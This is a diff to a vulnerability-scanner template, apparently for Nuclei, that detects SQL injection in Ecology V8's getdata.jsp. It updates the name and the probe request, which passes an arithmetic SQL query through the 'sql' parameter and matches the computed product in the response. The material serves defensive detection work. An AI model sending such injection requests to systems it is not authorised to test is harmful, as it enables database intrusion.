--- a/vulnerabilities/other/ecology-v8-sqli.yaml
+++ b/vulnerabilities/other/ecology-v8-sqli.yaml
@@ -1,7 +1,7 @@
 id: ecology-v8-sqli
 
 info:
-  name: Ecology V8 SQLI
+  name: Ecology V8 - SQL Injection
   author: ritikchaddha
   severity: high
   reference:
@@ -11,15 +11,14 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+5463*8656+as+id"
+      - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id"
 
     matchers-condition: and
     matchers:
-
       - type: word
-        words:
-          - "47287728"
         part: body
+        words:
+          - "474088963122"
 
       - type: status
         status:
